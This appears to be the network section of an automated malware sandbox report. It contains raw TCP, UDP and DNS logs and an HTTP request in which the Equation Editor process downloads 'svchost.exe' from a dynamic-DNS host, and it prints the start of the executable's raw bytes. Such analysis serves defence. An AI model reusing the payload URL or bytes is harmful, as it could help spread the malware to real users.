                                                                                                                                                Nov 20, 2020 11:23:48.550652027 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550653934 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550688982 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550689936 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550726891 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550751925 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550765038 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550765038 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550801039 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550812006 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550849915 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550853968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550889015 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550890923 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550926924 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.550930023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550970078 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.550981998 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551002979 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551007032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551043034 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551044941 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551081896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551083088 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551121950 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551130056 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551167965 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551171064 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551209927 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551212072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551249027 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551261902 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551286936 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551287889 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551322937 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551327944 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551359892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551362038 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551395893 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551398993 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551434994 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551443100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551485062 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551485062 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551522017 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551522017 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551562071 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551562071 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551599979 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551603079 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551637888 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551637888 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551671982 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551676035 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551712990 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551723957 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551748991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551759005 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551798105 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551800013 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551836967 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551839113 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551872969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551875114 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551911116 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551913023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551949024 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551949978 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551985025 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551985979 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552022934 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552022934 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552064896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552069902 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552109003 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552112103 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552149057 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552150011 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552187920 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552192926 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552227020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552227974 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552264929 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552265882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552301884 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552301884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552337885 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552340031 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552377939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552387953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552428961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552429914 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552465916 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552470922 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552500010 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552504063 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552539110 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552541971 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552577019 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552577972 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552613020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552615881 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552651882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552653074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552689075 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552700043 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552736998 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552742958 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552779913 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552781105 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552814960 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552819014 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552853107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552856922 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552892923 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552895069 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552931070 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552932024 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552969933 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552999020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553010941 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553023100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553065062 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553067923 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553102016 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553134918 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553142071 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553150892 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553184986 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.556823969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566247940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566281080 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566307068 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566328049 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566346884 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566349030 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566349983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566394091 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566395044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566428900 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566440105 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566464901 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566471100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566509008 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566534996 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566572905 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566572905 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566595078 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566611052 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566616058 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566634893 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566643953 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566654921 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566659927 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566674948 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566684008 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566699028 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566704988 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566720009 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566729069 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566740036 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566747904 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566761017 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566770077 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566781044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566785097 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566793919 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566806078 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566826105 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566832066 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566845894 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566854954 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566863060 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566873074 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566893101 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566900015 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.785767078 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.785824060 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.785871983 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.785912991 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.785950899 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.785990953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.786123991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786160946 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786166906 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786170959 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786175013 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786180019 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786269903 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.786344051 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786484957 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.786573887 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786581993 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.786653042 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.786679983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786710978 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786725044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.786788940 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.786904097 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.787105083 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.787142992 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.787167072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.787209988 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.787264109 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.787277937 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.787347078 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.788923025 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:49.346463919 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:24:55.891556025 CET4916680192.168.2.2291.195.241.137
                                                                                                                                                Nov 20, 2020 11:24:55.912769079 CET804916691.195.241.137192.168.2.22
                                                                                                                                                Nov 20, 2020 11:24:55.912883043 CET4916680192.168.2.2291.195.241.137
                                                                                                                                                Nov 20, 2020 11:24:55.913090944 CET4916680192.168.2.2291.195.241.137
                                                                                                                                                Nov 20, 2020 11:24:55.934171915 CET804916691.195.241.137192.168.2.22
                                                                                                                                                Nov 20, 2020 11:24:55.956897974 CET804916691.195.241.137192.168.2.22
                                                                                                                                                Nov 20, 2020 11:24:55.956932068 CET804916691.195.241.137192.168.2.22
                                                                                                                                                Nov 20, 2020 11:24:55.957194090 CET4916680192.168.2.2291.195.241.137
                                                                                                                                                Nov 20, 2020 11:24:55.957243919 CET4916680192.168.2.2291.195.241.137
                                                                                                                                                Nov 20, 2020 11:24:55.978351116 CET804916691.195.241.137192.168.2.22
                                                                                                                                                Nov 20, 2020 11:25:16.493370056 CET4916780192.168.2.22180.215.92.80
                                                                                                                                                Nov 20, 2020 11:25:16.686700106 CET8049167180.215.92.80192.168.2.22
                                                                                                                                                Nov 20, 2020 11:25:16.686799049 CET4916780192.168.2.22180.215.92.80
                                                                                                                                                Nov 20, 2020 11:25:16.686966896 CET4916780192.168.2.22180.215.92.80
                                                                                                                                                Nov 20, 2020 11:25:16.929497957 CET8049167180.215.92.80192.168.2.22
                                                                                                                                                Nov 20, 2020 11:25:17.717480898 CET4916780192.168.2.22180.215.92.80
                                                                                                                                                Nov 20, 2020 11:25:17.932526112 CET8049167180.215.92.80192.168.2.22
                                                                                                                                                Nov 20, 2020 11:25:17.932602882 CET4916780192.168.2.22180.215.92.80

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 20, 2020 11:23:46.500763893 CET5219753192.168.2.228.8.8.8
                                                                                                                                                Nov 20, 2020 11:23:46.550245047 CET53521978.8.8.8192.168.2.22
                                                                                                                                                Nov 20, 2020 11:24:55.833583117 CET5309953192.168.2.228.8.8.8
                                                                                                                                                Nov 20, 2020 11:24:55.879791975 CET53530998.8.8.8192.168.2.22
                                                                                                                                                Nov 20, 2020 11:25:16.152932882 CET5283853192.168.2.228.8.8.8
                                                                                                                                                Nov 20, 2020 11:25:16.491955996 CET53528388.8.8.8192.168.2.22

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Nov 20, 2020 11:23:46.500763893 CET192.168.2.228.8.8.80x8ac6Standard query (0)workfinethdysanotherrainbowlomoyentthghf.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:24:55.833583117 CET192.168.2.228.8.8.80xa14dStandard query (0)www.pestigenix.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:25:16.152932882 CET192.168.2.228.8.8.80xccffStandard query (0)www.atlanticdentallab.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Nov 20, 2020 11:23:46.550245047 CET8.8.8.8192.168.2.220x8ac6No error (0)workfinethdysanotherrainbowlomoyentthghf.ydns.eu103.125.191.5A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:24:55.879791975 CET8.8.8.8192.168.2.220xa14dNo error (0)www.pestigenix.com91.195.241.137A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:25:16.491955996 CET8.8.8.8192.168.2.220xccffNo error (0)www.atlanticdentallab.com180.215.92.80A (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • workfinethdysanotherrainbowlomoyentthghf.ydns.eu
                                                                                                                                                • www.pestigenix.com
                                                                                                                                                • www.atlanticdentallab.com

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.2249165103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Nov 20, 2020 11:23:46.787297010 CET0OUTGET /worksdoc/svchost.exe HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 20, 2020 11:23:47.007692099 CET2INHTTP/1.1 200 OK
                                                                                                                                                Date: Fri, 20 Nov 2020 10:23:44 GMT
                                                                                                                                                Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                Last-Modified: Thu, 19 Nov 2020 21:43:46 GMT
                                                                                                                                                ETag: "92600-5b47c9f64afa6"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 599552
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 e7 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 09 00 00 06 00 00 00 00 00 00 de 3d 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 55 96 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 3d 09 00 4f 00 00 00 00 40 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 1d 09 00 00 20 00 00 00 1e 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 09 00 00 04 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 88 9d 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 98 2b 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 3f 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 